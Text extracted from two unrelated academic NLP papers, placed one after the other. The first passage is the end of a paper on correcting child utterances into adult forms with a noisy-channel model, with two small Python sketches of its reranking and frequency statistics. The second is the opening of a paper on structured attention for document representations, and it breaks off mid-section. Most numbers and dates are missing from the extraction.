the second indicates if a “nsubj” relation exists where the dependent is an ac- cusative pronoun (e.g. “him ate the cookie”). these features and the one following have previously been used in classifier based error detection (morley and prud’hommeaux, ). contains finite verb: this boolean feature is true if the pos tags of ti include a finite verb. this feature differentiates structures like “i am going” from “i going.” question template features: we define tem- plates for wh- and yes-no questions. a sentence fits the wh- question template if it begins with a wh- word, followed by an auxiliary or copula verb (e.g. “who did...”). a sentence fits the yes-no template when it begins with an auxiliary or copula verb, then a noun subject followed by a verb or adjective (e.g. “are you going...”). we include one boolean feature for each of these templates indicating when a tem- plate match is inappropriate, when the original child utterance terminates in a period instead of a question mark. in addition to the two features for inappropri- ate template matches, we have a single feature that signals appropriate matches of either question tem- plate — when the original child utterance terminates in a question mark. child utterance human correction machine correction i am not put in my mouth. i am not putting it in my mouth. i am not going to put it in my mouth. this one have water? does this one have water? this one has water? want to read the book. i want to read the book. you want to read the book. why you going to get two? why are you going to get two? why are you going to have two? you very sticky. you are very sticky. you are very sticky. he no like. he does not like it. he does not like that. yeah it looks a lady. yeah it looks like a lady yeah it looks like a lady. eleanor come too. eleanor came too. eleanor come too. desk in here. the desk is in here desk is in here. why he’s doc? why is he called doc? he’s up doc? table : randomly selected test output generated by our complete error correction model, along with corresponding child utterances and human corrections. experiments and analysis baselines we compare our system’s performance with two pre-existing baselines. the first is a stan- dard phrase-based machine translation system using moses (koehn et al., ) with giza++ (och and ney, ) word alignments. we hold out % of the training data for tuning using the mert algo- rithm with bleu objective (och, ). the second baseline is our implementation of the esl error correction system described by park and levy ( ). like our system, this baseline trains fst noise models using em in the v-expectation semiring. our noise model is crafted specifically for the child language domain, and so differs from park and levy’s in several ways: first, we capture a wider range of word-swaps, with richer parameteri- zation allowing many more translation options. as a result, our model has , parameters, many more than the esl model’s . these parameters corre- spond to learned probability distributions, whereas in the esl model many of the distributions are fixed as uniform. we also capture a larger class of errors, including deletions, change of auxiliary lemma, and inflectional overgeneralizations. finally, we use a discriminative reranking step to model long-range syntactic dependencies. although the esl model is originally geared towards fully unsupervised train- ing, we train this baseline in the same supervised framework as our model. 
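as a point of reference for the discriminative reranking procedure used in our model (and applied to this baseline in the same supervised framework), a minimal averaged-perceptron sketch over precomputed n-best feature vectors follows; the data layout, the choice of target index, and the number of training rounds are illustrative assumptions, not the exact settings reported here.

```python
import numpy as np

def train_reranker(examples, n_rounds=10):
    """examples: list of (features, target) pairs, where `features` is a 2-d array
    with one row per n-best candidate and `target` is the index of the candidate
    chosen as the gold proxy (the list entry maximizing the evaluation metric).
    returns the averaged weight vector."""
    dim = examples[0][0].shape[1]
    w = np.zeros(dim)          # current weights
    w_sum = np.zeros(dim)      # running sum for averaging
    updates = 0
    for _ in range(n_rounds):  # training is cut off after a fixed number of rounds
        for features, target in examples:
            predicted = int(np.argmax(features @ w))
            if predicted != target:
                w += features[target] - features[predicted]
            w_sum += w
            updates += 1
    return w_sum / updates

def rerank(features, w):
    """pick the candidate translation with the highest linear score."""
    return int(np.argmax(features @ w))
```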
evaluation and performance we train all models on % of our child-adult sentence pairs and test on the remaining %. for illustration, selected output from our model is shown in table . predictions are evaluated with bleu score (pap- ineni et al., ) and word error rate (wer), de- fined as the minimum string edit distance (in words) between reference and predicted translations, di- vided by length of the reference. as a control, we compare all results against scores for the uncor- rected child sentences themselves. as reported in table , our model achieves the best scores for both metrics. bleu score increases from for child sentences to , while wer is reduced from . to . . interestingly, moses achieves a bleu score of — still four points below our model — but ac- tually increases wer to . . for both metrics, the esl system increases error. this is not surprising given that its intended application is in an entirely different domain. error analysis we measured the performance of our model over the six most common categories of child divergence, including deletions of various function words and overgeneralizations of past tense forms (e.g. “maked” for “made”). we first iden- tified model parameters associated with each cate- gory, and then counted the number of correct and in- correct parameter firings on the test sentences. as table indicates, our model performs reasonably well on “be” verb deletions, preposition deletions, and overgeneralizations, but has difficulty correcting pronoun and auxiliary deletions. in general, hypothesizing dropped words burdens the noise model by adding additional draws from multinomial distributions to the derivation. to pre- bleu wer wer reranking . . bleu reranking . . no reranking . . moses . . esl . . child sentences . . table : wer and bleu scores. our system’s perfor- mance using various reranking schemes (bleu objec- tive, wer objective and none) is contrasted with moses mt and esl error correction baselines, as well as un- corrected test sentences. best performance under each metric is shown in bold. dict a deletion, either the language model or the reranker must strongly prefer including the omit- ted word. a syntax-based noise model may achieve better performance in detecting and correcting child word drops. while our model parameterization and perfor- mance rely on the largely constrained nature of child language errors, we observe some instances in which it is overly restrictive. for % of utterances in our corpus, it is impossible to recover the exact gold-standard adult sentence. these sentences fea- ture errors like reordering or lexical lemma swaps — for example “i talk mexican” for “i speak spanish.” while our model may correct other errors in these sentences, a perfect correction is unattainable. sometimes, our model produces appropriate forms which by happenstance do not conform to the annotators’ decision. for example, in the second row of table , the model corrects “this one have water?” to “this one has water?”, instead of the more verbose correction chosen by the annotators (“does this one have water?”). similarly, our model sometimes produces corrections which seem appro- priate in isolation, but do not preserve the meaning implied by the larger conversational context. for ex- ample, in row three of table , the sentence “want to read the book.” is recognized both by our hu- man annotators and the system as requiring a pro- noun subject. 
unlike the annotators, however, the model has no knowledge of conversational context, so it chooses the highest probability pronoun — in this case “you” — instead of the contextually correct “i.” error type count f p r be deletions . . . pronoun deletions . . . aux. deletions . . . prep. deletions . . . det. deletions . . . overgen. past . . . table : frequency of the six most common error types in test data, along with our model’s corresponding f- measure, precision and recall. all counts are ±. at p = . under a binomial normal approximation inter- val. % % % % % % % % % % % . . . . . . . % train data b l e u w e r figure : performance with limited training data. wer is drawn as the dashed line, and bleu as the solid line. learning curves in figure , we see that the learning curves for our model initially rise sharply, then remain relatively flat. using only % of our training data ( sentences), we increase bleu from (using just the language model) to almost . we only reach our reported bleu score of when adding the final % of training data. this result emphasizes the specificity of our parameteri- zation. because our model is so tailored to the child- language scenario, only a few examples of each er- ror type are needed to find good parameter values. we suspect that more annotated data would lead to a continued but slow increase in performance. training and testing across children we use our system to investigate the hypothesis that lan- guage acquisition follows a similar path across chil- dren (brown, ). to test this hypothesis, we train our model on all children excluding adam, who alone is responsible for % of our sentences. we then test the learned model on the separated adam trained on: bleu wer adam . . all others . . uncorrected . . table : performance on adam’s sentences training on other children, versus training on himself. best perfor- mance under each metric is shown in bold. data. these results are contrasted with performance of -fold cross validation training and testing solely on adam’s utterances. performance statistics are given in table . we first note that models trained in both scenar- ios lead to large error reductions over the child sen- tences. this provides evidence that our model cap- tures general, and not child-specific, error patterns. although training exclusively on adam does lead to increased bleu score ( . vs . ), wer is minimized when using the larger volume of train- ing data from other children (. vs . ). taken as a whole, these results suggest that training and testing on separate children does not degrade perfor- mance. this finding supports the general hypothesis of shared developmental paths. plotting child language errors over time af- ter training on annotated data, we predict diver- gences in all available data from the children in roger brown’s study — adam, eve and sarah — as well as abe (kuczaj, ), a child from a sep- arate study over a similar age-range. we plot each child’s per-utterance frequency of preposition omis- sions in figure . since we evaluate over , utterances and reranking has no impact on preposi- tion drop prediction, we skip the reranking step to save computation. in figure , we see that adam and sarah’s prepo- sition drops spike early, and then gradually decrease in frequency as their preposition use moves towards that of an adult. although eve’s data covers an ear- lier time period, we see that her pattern of prepo- sition drops shows a similar spike and gradual de- crease. 
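the per-utterance frequencies plotted for each child, and the binomial normal-approximation intervals quoted with them, can be computed as in the sketch below; the grouping key (age in months) and the critical value are assumptions standing in for the exact settings used.

```python
import math
from collections import defaultdict

def omission_frequency_by_age(utterances, z=1.96):
    """utterances: iterable of (age_in_months, n_predicted_omissions) pairs, one
    entry per utterance. returns {age: (frequency, half_width)}, where half_width
    is the binomial normal-approximation interval z * sqrt(p * (1 - p) / n)."""
    counts = defaultdict(lambda: [0, 0])   # age -> [omission count, utterance count]
    for age, n_omissions in utterances:
        counts[age][0] += n_omissions
        counts[age][1] += 1
    result = {}
    for age, (omissions, n) in counts.items():
        p = omissions / n
        result[age] = (p, z * math.sqrt(p * (1 - p) / n))
    return result
```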
this is consistent with eve’s general lan- guage precocity. brown’s conclusion — that the lan- guage development of these three children advanced in similar stages at different times — is consistent with our predictions. however, when we examine . . . . . . . adam eve sarah abe age (months) p e r- u tt e ra n c e f re q u e n c y figure : automatically detected preposition omissions in un-annotated utterances from four children over time. assuming perfect model predictions, frequencies are ±. at p = . under a binomial normal approxima- tion interval. prediction error is given in table . abe we do not observe the same pattern. this points to a degree of variance across children, and suggests the use of our model as a tool for further empirical refinement of language development hy- potheses. discussion our error correction system is de- signed to be more constrained than a full-scale mt system, focusing parameter learning on errors that are known to be common to child language learn- ers. reorderings are prohibited, lexical word swaps are limited to inflectional changes, and deletions are restricted to function word categories. by highly re- stricting our hypothesis space, we provide an induc- tive bias for our model that matches the child lan- guage domain. this is particularly important since the size of our training set is much smaller than that usually used in mt. indeed, as figure shows, very little data is needed to achieve good performance. in contrast, the esl baseline suffers because its generative model is too restricted for the domain of transcribed child language. as shown above in table , child deletions of function words are the most frequent error types in our data. since the esl model does not capture word deletions, and has a more restricted notion of word swaps, % of child sentences in our training corpus cannot be translated to their reference adult versions. the result is that the esl model tends to rely too heavily on the lan- guage model. for example, on the sentence “i com- though it is of course possible that a similar spike and drop-off occurred earlier in abe’s development. ing to you,” the esl model improves n-gram prob- ability by producing “i came to you” instead of the correct “i am coming to you”. this increases error over the child sentence itself. in addition to the domain-specific generative model, our approach has the advantage of long- range syntactic information encoded by reranking features. although the perceptron algorithm places high weight on the generative model probability, it alters the predictions in out of test sentences, in all cases an improvement. three of these rerank- ing changes add a noun subject, five enforce ques- tion structure, and nine add a main verb. conclusion and future work in this paper we introduce a corpus of divergent child sentences with corresponding adult forms, en- abling the systematic computational modeling of child language by relating it to adult grammar. we propose a child-to-adult translation task as a means to investigate child language development, and pro- vide an initial model for this task. our model is based on a noisy-channel assump- tion, allowing for the deletion and corruption of in- dividual words, and is trained using fst techniques. despite the debatable cognitive plausibility of our setup, our results demonstrate that our model cap- tures many standard divergences and reduces the average error of child sentences by approximately %, with high performance on specific frequently occurring error types. 
the model allows us to chart aspects of language development over time, without the need for addi- tional human annotation. our experiments show that children share common developmental stages in lan- guage learning, while pointing to child-specific sub- tleties in preposition use. in future work, we intend to dynamically model child language ability as it grows and shifts in re- sponse to internal processes and external stimuli. we also plan to develop and train models specializ- ing in the detection of specific error categories. by explicitly shifting our model’s objective from child- adult translation to the detection of some particular error, we hope to improve our analysis of child di- vergences over time. acknowledgments the authors thank the reviewers and acknowledge support by the nsf (grant iis- ) and a re- search gift from google. any opinions, findings, or conclusions are those of the authors, and do not nec- essarily reflect the views of the nsf. references a. alishahi. . computational modeling of human language acquisition. synthesis lectures on human language technologies, ( ): – . c. allauzen, m. riley, j. schalkwyk, w. skut, and m. mohri. . openfst: a general and efficient weighted finite-state transducer library. implementa- tion and application of automata, pages – . r.h. baayen, r. piepenbrock, and l. gulikers. . celex (cd-rom). linguistic data consortium. e. bates, i. bretherton, and l. snyder. . from first words to grammar: individual differences and disso- ciable mechanisms. cambridge university press. d.c. bellinger and j.b. gleason. . sex differences in parental directives to young children. sex roles, ( ): – . l. bliss. . the development of modals. journal of applied developmental psychology, : – . l. bloom, l. hood, and p. lightbown. . imitation in language development: if, when, and why. cognitive psychology, ( ): – . l. bloom, p. lightbown, l. hood, m. bowerman, m. maratsos, and m.p. maratsos. . structure and variation in child language. monographs of the soci- ety for research in child development, pages – . l. bloom. . one word at a time: the use of single word utterances before syntax. mouton. p. bloom. . subjectless sentences in child language. linguistic inquiry, ( ): – . j.n. bohannon iii and a.l. marquis. . chil- dren’s control of adult speech. child development, ( ): – . r. brown. . a first language: the early stages. harvard university press. v. carlson-luden. . causal understanding in the -month-old. ph.d. thesis, university of colorado at boulder. e.c. carterette and m.h. jones. . informal speech: alphabetic & phonemic texts with statistical analyses and tables. university of california press. m. chodorow and c. leacock. . an unsupervised method for detecting grammatical errors. in proceed- ings of the north american chapter of the association for computational linguistics, pages – . m. collins and b. roark. . incremental parsing with the perceptron algorithm. in proceedings of the asso- ciation for computational linguistics, pages – , barcelona, spain, july. m. connor, y. gertner, c. fisher, and d. roth. . baby srl: modeling early language acquisition. in proceedings of the conference on computational nat- ural language learning, pages – . r. dale and a. kilgarriff. . helping our own: the hoo pilot shared task. in proceedings of the eu- ropean workshop on natural language generation, pages – . m.c. de marneffe, b. maccartney, and c.d. manning. . generating typed dependency parses from phrase structure parses. 
in proceedings of the in- ternational conference on language resources and evaluation, volume , pages – . m.j. demetras, k.n. post, and c.e. snow. . feed- back to first language learners: the role of repetitions and clarification questions. journal of child lan- guage, ( ): – . m.j. demetras. . working parents’ conversational responses to their two-year-old sons. m. dreyer, j.r. smith, and j. eisner. . latent- variable modeling of string transductions with finite- state methods. in proceedings of the conference on empirical methods in natural language processing, pages – . a. echihabi and d. marcu. . a noisy-channel ap- proach to question answering. in proceedings of the association for computational linguistics, pages – . j. eisner. . expectation semirings: flexible em for learning finite-state transducers. in proceedings of the esslli workshop on finite-state methods in nlp. m. gamon. . high-order sequence modeling for language learner error detection. in proceedings of the workshop on innovative use of nlp for building ed- ucational applications, pages – . l.c.g. haggerty. . what a two-and-one-half-year- old child said in one day. the pedagogical seminary and journal of genetic psychology, ( ): – . w.s. hall, w.c. tirre, a.l. brown, j.c. campoine, p.f. nardulli, ho abdulrahman, ma sozen, w.c. schno- brich, h. cecen, j.g. barnitz, et al. . the communicative environment of young children: social class, ethnic, and situational differences. bulletin of the center for children’s books, : . w.s. hall, w.e. nagy, and r.l. linn. . spoken words: effects of situation and social group on oral word usage and frequency. university of illinois at urbana-champaign, center for the study of reading. w.s. hall, w.e. nagy, and g. nottenburg. . sit- uational variation in the use of internal state words. technical report, university of illinois at urbana- champaign, center for the study of reading. h. hamburger and s. crain. . acquisition of cogni- tive compiling. cognition, ( ): – . r.p. higginson. . fixing: assimilation in language acquisition. university microfilms international. m.h. jones and e.c. carterette. . redundancy in children’s free-reading choices. journal of verbal learning and verbal behavior, ( - ): – . p. koehn, h. hoang, a. birch, c. callison-burch, m. federico, n. bertoldi, b. cowan, w. shen, c. moran, r. zens, et al. . moses: open source toolkit for statistical machine translation. in proceed- ings of the association for computational linguis- tics (interactive poster and demonstration sessions), pages – . s. a. kuczaj. . the acquisition of regular and irreg- ular past tense forms. journal of verbal learning and verbal behavior, ( ): – . j. lee and s. seneff. . automatic grammar cor- rection for second-language learners. in proceedings of the international conference on spoken language processing. x. lu. . automatic measurement of syntactic com- plexity in child language acquisition. international journal of corpus linguistics, ( ): – . b. macwhinney. . the childes project: tools for analyzing talk, volume . psychology press. b. macwhinney. . the talkbank project. cre- ating and digitizing language corpora: synchronic databases, : – . m. mohri. . system and method of epsilon removal of weighted automata and transducers, june . us patent , , . e. morley and e. prud’hommeaux. . using con- stituency and dependency parse features to identify er- rorful words in disordered language. in proceedings of the workshop on child, computer and interaction. a. ninio, c.e. snow, b.a. pan, and p.r. 
rollins. . classifying communicative acts in children’s interactions. journal of communication disorders, ( ): – . f.j. och and h. ney. . a systematic comparison of various statistical alignment models. computational linguistics, ( ): – . f.j. och. . minimum error rate training in statistical machine translation. in proceedings of the association for computational linguistics, pages – . r.e. owens. . language development: an intro- duction. pearson education, inc. k. papineni, s. roukos, t. ward, and w.j. zhu. . bleu: a method for automatic evaluation of machine translation. in proceedings of the association for computational linguistics, pages – . y.a. park and r. levy. . automated whole sentence grammar correction using a noisy channel model. pro- ceedings of the association for computational lin- guistics, pages – . a.m. peters. . the role of imitation in the devel- oping syntax of a blind child in perspectives on repeti- tion. text, ( ): – . k. post. . the language learning environment of laterborns in a rural florida community. ph.d. thesis, harvard university. c. quirk, c. brockett, and w. dolan. . monolin- gual machine translation for paraphrase generation. in proceedings of the conference on empirical methods in natural language processing, pages – . t. regier. . the emergence of words: attentional learning in form and meaning. cognitive science, ( ): – . a. ritter, c. cherry, and w.b. dolan. . data-driven response generation in social media. in proceedings of the conference on empirical methods in natural language processing, pages – . b. roark, r. sproat, c. allauzen, m. riley, j. sorensen, and t. tai. . the opengrm open-source finite- state grammar software libraries. in proceedings of the association for computational linguistics (system demonstrations), pages – . a. rozovskaya, m. sammons, j. gioja, and d. roth. . university of illinois system in hoo text cor- rection shared task. in proceedings of the european workshop on natural language generation, pages – . j. sachs. . talking about the there and then: the emergence of displaced reference in parent-child dis- course. children’s language, . k. sagae, a. lavie, and b. macwhinney. . auto- matic measurement of syntactic development in child language. in proceedings of the association for com- putational linguistics, pages – . s. sahakian and b. snyder. . automatically learn- ing measures of child language development. pro- ceedings of the association for computational lin- guistics (volume : short papers), pages – . c.e. snow, f. shonkoff, k. lee, and h. levin. . learning to play doctor: effects of sex, age, and ex- perience in hospital. discourse processes, ( ): – . e.l. stine and j.n. bohannon. . imitations, inter- actions, and language acquisition. journal of child language, ( ): – . x. sun, j. gao, d. micol, and c. quirk. . learning phrase-based spelling error models from clickthrough data. in proceedings of the association for computa- tional linguistics, pages – . p. suppes. . the semantics of children’s language. american psychologist, ( ): . t.z. tardif. . adult-to-child speech and language acquisition in mandarin chinese. ph.d. thesis, yale university. v. valian. . syntactic subjects in the early speech of american and italian children. cognition, ( - ): – . l. van houten. . role of maternal input in the acquisition process: the communicative strategies of adolescent and older mothers with their language learning children. in boston university conference on language development. a. warren-leubecker and j.n. 
bohannon iii. . intonation patterns in child-directed speech: mother-father differences. child development, ( ): – . a. warren. . sex differences in speech to children. ph.d. thesis, georgia institute of technology. b. wilson and a.m. peters. . what are you cookin' on a hot?: a three-year-old blind child's 'violation' of universal constraints on constituent movement. language, : – .

learning structured text representations

yang liu and mirella lapata
institute for language, cognition and computation, school of informatics, university of edinburgh, crichton street, edinburgh eh ab
yang.liu @ed.ac.uk, mlap@inf.ed.ac.uk

abstract

in this paper, we focus on learning structure-aware document representations from data without recourse to a discourse parser or additional annotations. drawing inspiration from recent efforts to empower neural networks with a structural bias (cheng et al., ; kim et al., ), we propose a model that can encode a document while automatically inducing rich structural dependencies. specifically, we embed a differentiable non-projective parsing algorithm into a neural model and use attention mechanisms to incorporate the structural biases. experimental evaluations across different tasks and datasets show that the proposed model achieves state-of-the-art results on document modeling tasks while inducing intermediate structures which are both interpretable and meaningful.

introduction

document modeling is a fundamental task in natural language processing useful to various downstream applications including topic labeling (xie and xing, ), summarization (chen et al., ; wolf and gibson, ), sentiment analysis (bhatia et al., ), question answering (verberne et al., ), and machine translation (meyer and webber, ). recent work provides strong evidence that better document representations can be obtained by incorporating structural knowledge (bhatia et al., ; ji and smith, ).
inspired by ex- isting theories of discourse, representations of docu- ment structure have assumed several guises in the lit- erature, such as trees in the style of rhetorical struc- ture theory (rst; mann and thompson, ), graphs (lin et al., ; wolf and gibson, ), entity transitions (barzilay and lapata, ), or combinations thereof (lin et al., ; mesgar and strube, ). the availability of discourse anno- tated corpora (carlson et al., ; prasad et al., ) has led to the development of off-the-shelf discourse parsers (e.g., feng and hirst, ; liu and lapata, ), and the common use of trees as representations of document structure. for example, bhatia et al. ( ) improve document-level senti- ment analysis by reweighing discourse units based on the depth of rst trees, whereas ji and smith ( ) show that a recursive neural network built on the output of an rst parser benefits text categoriza- tion in learning representations that focus on salient content. linguistically motivated representations of doc- ument structure rely on the availability of anno- tated corpora as well as a wider range of standard nlp tools (e.g., tokenizers, pos-taggers, syntactic parsers). unfortunately, the reliance on labeled data, which is both difficult and highly expensive to pro- duce, presents a major obstacle to the widespread use of discourse structure for document modeling. moreover, despite recent advances in discourse pro- cessing, the use of an external parser often leads to pipeline-style architectures where errors propagate to later processing stages, affecting model perfor- mance. it is therefore not surprising that there have been attempts to induce document representations di- rectly from data without recourse to a discourse parser or additional annotations. the main idea is transactions of the association for computational linguistics, vol. , pp. – , . action editor: bo pang. submission batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. to obtain hierarchical representations by first build- ing representations of sentences, and then aggre- gating those into a document representation (tang et al., a,b). yang et al. ( ) further demon- strate how to implicitly inject structural knowledge onto the representation using an attention mecha- nism (bahdanau et al., ) which acknowledges that sentences are differentially important in differ- ent contexts. their model learns to pay more or less attention to individual sentences when constructing the representation of the document. our work focus on learning deeper structure- aware document representations, drawing inspira- tion from recent efforts to empower neural networks with a structural bias (cheng et al., ). kim et al. ( ) introduce structured attention networks which are generalizations of the basic attention pro- cedure, allowing to learn sentential representations while attending to partial segmentations or subtrees. specifically, they take into account the dependency structure of a sentence by viewing the attention mechanism as a graphical model over latent vari- ables. they first calculate unnormalized pairwise at- tention scores for all tokens in a sentence and then use the inside-outside algorithm to normalize the scores with the marginal probabilities of a depen- dency tree. without recourse to an external parser, their model learns meaningful task-specific depen- dency structures, achieving competitive results in several sentence-level tasks. 
however, for docu- ment modeling, this approach has two drawbacks. firstly, it does not consider non-projective depen- dency structures, which are common in document- level discourse analysis (hayashi et al., ; lee et al., ). as illustrated in figure , the tree struc- ture of a document can be flexible and the depen- dency edges may cross. secondly, the inside-outside algorithm involves a dynamic programming process which is difficult to parallelize, making it impracti- cal for modeling long documents. in this paper, we propose a new model for rep- resenting documents while automatically learning richer structural dependencies. using a variant of kirchhoff’s matrix-tree theorem (tutte, ), our model implicitly considers non-projective depen- in our experiments, adding the inside-outside pass in- creases training time by a factor of . the next time you hear a member of congress moan about the deficit, consider what congress did friday. the senate, - ,voted to increase to $ , the ceiling on insured mortgages from the fha, which lost $ . billion in loan defaults last year. then , by voice vote , the senate voted a porkbarrel bill, approved thursday by the house, for domestic military construction. the bush request to what the senators gave themselves. figure : the document is analyzed in the style of rhetorical structure theory (mann and thompson, ), and represented as a dependency tree fol- lowing the conversion algorithm of hayashi et al. ( ). dency tree structures. we keep each step of the learning process differentiable, so the model can be trained in an end-to-end fashion and induce dis- course information that is helpful to specific tasks without an external parser. the inside-outside model of kim et al. ( ) and our model both have a o(n ) worst case complexity. however, major operations in our approach can be parallelized ef- ficiently on gpu computing hardware. although our primary focus is on document modeling, there is nothing inherent in our model that prevents its ap- plication to individual sentences. advantageously, it can induce non-projective structures which are re- quired for representing languages with free or flexi- ble word order (mcdonald and satta, ). our contributions in this work are threefold: a model for learning document representations whilst taking structural information into account; an effi- cient training procedure which allows to compute document level representations of arbitrary length; and a large scale evaluation study showing that the proposed model performs competitively against strong baselines while inducing intermediate struc- tures which are both interpretable and meaningful. background in this section, we describe how previous work uses the attention mechanism for representing individual sentences. the key idea is to capture the interaction between tokens within a sentence, generating a con- text representation for each word with weak struc- tural information. this type of intra-sentence at- tention encodes relationships between words within u u u u u a a a a r r r r r figure : intra-sentential attention mechanism; aij denotes the normalized attention score between tokens ui and uj. each sentence and differs from inter-sentence at- tention which has been widely applied to sequence transduction tasks like machine translation (bah- danau et al., ) and learns the latent alignment between source and target sequences. figure provides a schematic view of the intra- sentential attention mechanism. 
given a sen- tence represented as a sequence of n word vectors [u ,u , · · · ,un], for each word pair 〈ui,uj〉, the attention score aij is estimated as: fij = f(ui,uj) ( ) aij = exp(fij)∑n k= exp(fik) ( ) where f() is a function for computing the unnor- malized score fij which is then normalized by cal- culating a probability distribution aij. individual words collect information from their context based on aij and obtain a context representation: ri = n∑ j= aijuj ( ) where attention score aij indicates the (dependency) relation between the i-th and the j-th-words and how information from uj should be fed into ui. despite successful application of the above atten- tion mechanism in sentiment analysis (cheng et al., ) and entailment recognition (parikh et al., ), the structural information under considera- tion is shallow, limited to word-word dependencies. since attention is computed as a simple probabil- ity distribution, it cannot capture more elaborate structural dependencies such as trees (or graphs). kim et al. ( ) induce richer internal structure by imposing structural constraints on the probabil- ity distribution computed by the attention mecha- nism. specifically, they normalize fij with a pro- jective dependency tree using the inside-outside al- gorithm (baker, ): fij = f(ui,uj) ( ) a = inside-outside(f) ( ) ri = n∑ j= aijuj ( ) this process is differentiable, so the model can be trained end-to-end and learn structural information without relying on a parser. however, efficiency is a major issue, since the inside-outside algorithm has time complexity o(n ) (where n represents the number of tokens) and does not lend itself to easy parallelization. the high order complexity renders the approach impractical for real-world applications. encoding text representations in this section we present our document representa- tion model. we follow previous work (tang et al., a; yang et al., ) in modeling documents hierarchically by first obtaining representations for sentences and then composing those into a document representation. structural information is taken into account while learning representations for both sen- tences and documents and an attention mechanism is applied on both words within a sentence and sen- tences within a document. the general idea is to force pair-wise attention between text units to form a non-projective dependency tree, and automatically induce this tree for different natural language pro- cessing tasks in a differentiable way. in the follow- ing, we first describe how the attention mechanism is applied to sentences, and then move on to present our document-level model. . sentence model let t = [u ,u , · · · ,un] denote a sentence con- taining a sequence of words, each represented by a vector u, which can be pre-trained on a large cor- pus. long short-term memory neural networks (lstms; hochreiter and schmidhuber, ) have u u u u d d d d e e e e calculat e st ruct ured at t ent ion updat e sem ant ic vect ors r r r r figure : sentence representation model: ut is the input vector for the t-th word, et and dt are semantic and structure vectors, respectively. been successfully applied to various sequence mod- eling tasks ranging from machine translation (bah- danau et al., ), to speech recognition (graves et al., ), and image caption generation (xu et al., ). in this paper we use bidirectional lstms as a way of representing elements in a se- quence (i.e., words or sentences) together with their contexts, capturing the element and an “infinite” window around it. 
specifically, we run a bidirec- tional lstm over sentence t , and take the output vectors [h ,h , · · · ,hn] as the representations of words in t , where ht ∈ rk is the output vector for word ut based on its context. we then exploit the structure of t which we in- duce based on an attention mechanism detailed be- low to obtain more precise representations. inspired by recent work (daniluk et al., ; miller et al., ), which shows that the conventional way of us- ing lstm output vectors for calculating both atten- tion and encoding word semantics is overloaded and likely to cause performance deficiencies, we decom- pose the lstm output vector in two parts: [et,dt] = ht ( ) where et ∈ rkt , the semantic vector, encodes se- mantic information for specific tasks, and dt ∈ rks , the structure vector, is used to calculate structured attention. we use a series of operations based on the matrix- tree theorem (tutte, ) to incorporate the struc- tural bias of non-projective dependency trees into the attention weights. we constrain the probabil- ity distributions aij (see equation ( )) to be the posterior marginals of a dependency tree structure. we then use the normalized structured attention, to build a context vector for updating the semantic vector of each word, obtaining new representations [r ,r , · · · ,rn]. an overview of the model is pre- sented in figure . we describe the attention mech- anism in detail in the following section. . structured attention mechanism dependency representations of natural language are a simple yet flexible mechanism for encoding words and their syntactic relations through directed graphs. much work in descriptive linguistics (melc̆uk, ; tesniére, ) has advocated their suitability for representing syntactic structure across languages. a primary advantage of dependency representations is that they have a natural mechanism for representing discontinuous constructions arising from long dis- tance dependencies or free word order through non- projective dependency edges. more formally, building a dependency tree amounts to finding latent variables zij for all i = j, where word i is the parent node of word j, un- der some global constraints, amongst which the single-head constraint is the most important, since it forces the structure to be a rooted tree. we use a variant of kirchhoff’s matrix-tree theorem (koo et al., ; tutte, ) to calculate the marginal probability of each dependency edge p(zij = ) of a non-projective dependency tree, and this probabil- ity is used as the attention weight that decides how much information is collected from child unit j to the parent unit i. we first calculate unnormalized attention scores fij with structure vector d (see equation ( )) via a bilinear function: tp = tanh(wpdi) ( ) tc = tanh(wcdj) ( ) fij = t t p watc ( ) where wp ∈ rks∗ks and wc ∈ rks∗ks are the weights for building the representation of parent and child nodes. wa ∈ rks∗ks is the weight for the bi- linear transformation. f ∈ rn∗n can be viewed as a weighted adjacency matrix for a graph g with n nodes where each node corresponds to a word in a sentence. we also calculate the root score fri , indi- cating the unnormalized possibility of a node being the root: fri = wrdi ( ) where wr ∈ r ∗ks . we calculate p(zij = ), the marginal probability of the dependency edge, fol- lowing koo et al. 
( ):

A_ij = 0 if i = j, exp(f_ij) otherwise
L_ij = Σ_{i'=1..n} A_{i'j} if i = j, −A_ij otherwise
L̄_ij = exp(f_i^r) if i = 1, L_ij if i > 1
p(z_ij = 1) = (1 − δ_{1,j}) A_ij [L̄^{−1}]_{jj} − (1 − δ_{i,1}) A_ij [L̄^{−1}]_{ji}
p(root(i)) = exp(f_i^r) [L̄^{−1}]_{i1}

where 1 ≤ i ≤ n and 1 ≤ j ≤ n. L ∈ R^{n × n} is the laplacian matrix for graph g and L̄ ∈ R^{n × n} is a variant of L that takes the root node into consideration, and δ is the kronecker delta. the key for the calculation to hold is for L^(i,i), the minor of the laplacian matrix L with respect to row i and column i, to be equal to the sum of the weights of all directed spanning trees of g which are rooted at i. p(z_ij = 1) is the marginal probability of the dependency edge between the i-th and j-th words. p(root(i)) is the marginal probability of the i-th word headed by the root of the tree. details of the proof can be found in koo et al. ( ). we denote the marginal probabilities p(z_ij = 1) as a_ij and p(root(i)) as a_i^r. this can be interpreted as attention scores which are constrained to converge to a structured object, a non-projective dependency tree, in our case. we update the semantic vector e_i of each word with structured attention:

p_i = Σ_{k=1..n} a_ki e_k + a_i^r e_root
c_i = Σ_{k=1..n} a_ik e_k
r_i = tanh(W_r [e_i, p_i, c_i])

where p_i ∈ R^{k_e} is the context vector gathered from possible parents of u_i and c_i ∈ R^{k_e} the context vector gathered from possible children, and e_root is a special embedding for the root node. the context vectors are concatenated with e_i and transformed with weights W_r ∈ R^{k_e × 3k_e} to obtain the updated semantic vector r_i ∈ R^{k_e} with rich structural information (see figure ).

. document model

we build document representations hierarchically: sentences are composed of words and documents are composed of sentences. composition on the document level also makes use of structured attention in the form of a dependency graph. dependency-based representations have been previously used for developing discourse parsers (hayashi et al., ; li et al., ) and in applications such as summarization (hirao et al., ). as illustrated in figure , given a document with n sentences [s_1, s_2, ..., s_n], for each sentence s_i the input is a sequence of word embeddings [u_i1, u_i2, ..., u_im], where m is the number of tokens in s_i. by feeding the embeddings into a sentence-level bi-lstm and applying the proposed structured attention mechanism, we obtain the updated semantic vectors [r_i1, r_i2, ..., r_im]. then a pooling operation produces a fixed-length vector v_i for each sentence. analogously, we view the document as a sequence of sentence vectors [v_1, v_2, ..., v_n] whose embeddings are fed to a document-level bi-lstm. application of the structured attention mechanism creates new semantic vectors [q_1, q_2, ..., q_n] and another pooling operation yields the final document representation y.

. end-to-end training

our model can be trained in an end-to-end fashion since all operations required for computing structured attention and using it to update the semantic
